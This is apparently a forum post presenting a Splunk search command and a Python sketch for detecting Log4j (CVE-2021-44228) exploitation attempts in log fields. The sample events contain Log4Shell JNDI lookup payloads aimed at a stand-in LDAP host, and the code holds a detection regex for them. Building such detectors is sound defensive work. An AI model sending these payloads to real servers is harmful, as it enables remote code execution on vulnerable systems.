Based on Karan Lyons' gist (https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6), I've produced a custom search command for detecting Log4j exploitation attempts (CVE-2021-44228, CVE-2021-45046). It's simple to use: pipe search results to the log4shellregex command with the name of the field to inspect, and it will output a field called log4shellregex.
Here's an oversimplified example that passes the raw event:
index=* sourcetype=log4
| log4shellregex _raw
| where isnotnull(log4shellregex)
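
The same field-in, field-out behaviour can be sketched offline in Python. This is an added example, not the command's own code and not the regex from the gist: the pattern is a deliberately simplified assumption, the function names are hypothetical, and the sample events are constructed.

```python
import re
from urllib.parse import unquote

# Simplified pattern (assumption): a literal "${jndi:" lookup opener, any case.
# The gist's regex is broader; this one is only for illustration.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}\s]*\}?", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # bound repeated URL-decoding of a single value


def normalize(value):
    """URL-decode up to MAX_DECODE_ROUNDS times, stopping once the value is stable."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def log4shell_match(events, field, out_field="log4shellregex"):
    """Yield a copy of each event; set out_field to the matched text on a hit."""
    for event in events:
        result = dict(event)
        value = event.get(field)
        # Events that lack the field (or hold a non-string) pass through untouched.
        hit = JNDI_LOOKUP.search(normalize(value)) if isinstance(value, str) else None
        if hit:
            result[out_field] = hit.group(0)
        yield result


def flagged(events, field):
    """Equivalent of `| where isnotnull(log4shellregex)`."""
    return [e for e in log4shell_match(events, field) if "log4shellregex" in e]


# Constructed sample events (documentation IP ranges, non-resolving host name).
SAMPLE_EVENTS = [
    {"_raw": '203.0.113.7 "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"'},
    {"_raw": '203.0.113.8 "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 "-"'},
    {"_raw": '198.51.100.4 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"'},
    {"message": "event without the requested field"},
]

if __name__ == "__main__":
    for event in flagged(SAMPLE_EVENTS, "_raw"):
        print(event["log4shellregex"], "<-", event["_raw"])
```

Matching on the decoded value matters because web access logs usually record the query string percent-encoded, so a pattern applied only to the literal text misses the second sample event.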